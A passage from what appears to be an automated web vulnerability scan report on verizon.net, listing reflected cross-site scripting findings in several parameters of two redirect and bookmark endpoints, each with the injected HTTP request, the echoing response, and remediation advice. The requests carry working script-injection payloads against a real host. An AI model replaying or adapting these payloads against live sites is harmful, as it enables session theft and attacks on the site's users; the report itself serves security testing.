GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041"%3balert(1)//db67067f088 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=tJRbMnyY3CbLSg6h2jR6dxjvj3LwGxBkZF7LyXnM5TCF48L4p6G4!-1123586183; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout26041";alert(1)//db67067f088";
</script>

3.91. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e18"%3balert(1)//1ba31d2c96 was submitted in the channel parameter. This input was echoed as c3e18";alert(1)//1ba31d2c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18"%3balert(1)//1ba31d2c96 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 220
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=N0LMMntDQ3RpWt1Ch6H3NPdJYM9gz6cJ23S2zTrpNkZFPldZyDTL!-732060938; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18";alert(1)//1ba31d2c96";
</script>

3.92. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28952"%3balert(1)//a64a12a87fe was submitted in the clientid parameter. This input was echoed as 28952";alert(1)//a64a12a87fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr28952"%3balert(1)//a64a12a87fe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=Sy2TMntffpm2wv5r2R1yT69GzhdMh6QTMyJDyYQztYdx8gR8vbmG!396615442; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr28952";alert(1)//a64a12a87fe&channel=Nwcnsmr";
</script>

3.93. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17699"%3balert(1)//ab8a8ea1a80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17699";alert(1)//ab8a8ea1a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&17699"%3balert(1)//ab8a8ea1a80=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=7g52MnyYqTy13KL31X5pnlsmbPLtrhtyjyP8rXxwQ66gzGgkcvRT!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&17699";alert(1)//ab8a8ea1a80=1";
</script>

3.94. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e720"%3balert(1)//81de72d4a66 was submitted in the q parameter. This input was echoed as 4e720";alert(1)//81de72d4a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='4e720"%3balert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=0h8GMntdpL8cWDx9D4hWqZ5N1YLxWM7dWJj4G1SnRG8pZrG7PSc9!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='4e720";alert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.95. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12a04"%3balert(1)//4994f840c79 was submitted in the web_search_type parameter. This input was echoed as 12a04";alert(1)//4994f840c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic12a04"%3balert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=vnznMntdnppz3b1fGRLzPLpJCkPys1C1rnTyhKdsftXNHrRpy26h!-1123586183; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic12a04";alert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.96. http://www.verizon.net/central/bookmark [WT.ti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2114"-alert(1)-"2cd6e3349c6 was submitted in the WT.ti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:43 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6";
</script>

3.97. http://www.verizon.net/central/bookmark [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a257"-alert(1)-"dfffcb2575a was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a";
</script>

3.98. http://www.verizon.net/central/bookmark [clientid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff42"-alert(1)-"af559367478 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr";
</script>

3.99. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac8b"-alert(1)-"6833c2efbb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1 HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:47:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:47:45 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1";
</script>

3.100. http://www.verizon.net/central/bookmark [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5125b"-alert(1)-"3649764250f was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:36 GMT
Connection: close
Vary: Accept-Encoding


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.101. http://www.verizon.net/central/bookmark [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /central/bookmark

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63d6b"-alert(1)-"fda7c8459b2 was submitted in the web_search_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /central/bookmark?action=googlesearch&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: www.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
